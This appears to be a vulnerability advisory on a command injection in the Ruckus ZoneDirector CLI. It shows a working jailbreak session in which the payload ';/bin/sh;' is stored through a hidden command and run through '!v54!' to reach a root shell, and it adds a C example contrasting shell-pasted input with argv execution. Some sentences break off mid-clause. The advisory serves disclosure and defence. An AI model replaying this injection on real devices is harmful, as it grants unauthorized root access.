This is a command injection vulnerability via a crafted CLI command with admin privilege.
/usr/bin/rkscli is the CLI that Ruckus uses for user interaction and that their web interface uses to run commands.
rkscli has a hidden CLI command, Ruckus, that writes a limited string to
!v54! is another hidden command. If !v54! does not receive any arguments, it executes /usr/sbin/sesame with the content of
The Ruckus command can write a command injection payload into
!v54! can execute this payload and, in this way, escape to
Information about the exploitation of the vulnerability can be found in our 36C3 talk.
Jailbreaking the Ruckus CLI using this exploit:
    rkscli: Ruckus
    <-input ";/bin/sh;"
    grrrr
    rkscli: !v54!
    What's your chow:
    Ruckus Wireless ZoneDirector -- Command Line Interface
    Enter 'help' for a list of built-in commands.
    ruckus$ echo $USER
    root
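The general pattern behind this class of bug, as an added example that is not taken from the advisory or from Ruckus code: a stored string pasted into a shell command line, next to the same string passed as a single argv element. `/bin/echo` stands in for the helper binary, the quoted `"%s"` command template is an assumption about how such a call might be built, and the sample string is a constructed, harmless analogue of the payload shape shown above.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define HELPER "/bin/echo" /* assumption: stand-in for the privileged helper */
#define SAMPLE "\";echo INJECTED;\"" /* constructed sample, harmless marker */

/* Vulnerable pattern: stored text is pasted into a shell command line,
 * so quotes and ';' inside it are parsed by /bin/sh as syntax. */
int run_via_shell(const char *stored, char *out, size_t n) {
    char cmd[256];
    snprintf(cmd, sizeof cmd, HELPER " \"%s\"", stored);
    FILE *p = popen(cmd, "r"); /* popen() runs: /bin/sh -c cmd */
    if (!p) return -1;
    size_t got = fread(out, 1, n - 1, p);
    out[got] = '\0';
    return pclose(p);
}

/* Hardened pattern: no shell involved; the stored text reaches the helper
 * as exactly one argv element, whatever characters it contains. */
int run_via_argv(const char *stored, char *out, size_t n) {
    int fds[2], status = -1;
    if (pipe(fds) != 0) return -1;
    pid_t pid = fork();
    if (pid < 0) { close(fds[0]); close(fds[1]); return -1; }
    if (pid == 0) { /* child: stdout -> pipe, then exec the helper directly */
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]); close(fds[1]);
        execl(HELPER, HELPER, stored, (char *)NULL);
        _exit(127);
    }
    close(fds[1]);
    FILE *f = fdopen(fds[0], "r");
    size_t got = f ? fread(out, 1, n - 1, f) : 0;
    out[got] = '\0';
    if (f) fclose(f); else close(fds[0]);
    waitpid(pid, &status, 0);
    return status;
}

int main(void) {
    char a[128], b[128];
    run_via_shell(SAMPLE, a, sizeof a);
    run_via_argv(SAMPLE, b, sizeof b);
    printf("shell: [%s]\nargv:  [%s]\ndiffer: %d\n", a, b, strcmp(a, b) != 0);
}
```

In the shell variant the marker command runs as a separate command; in the argv variant the helper receives the whole string, quotes and semicolons included, as inert data.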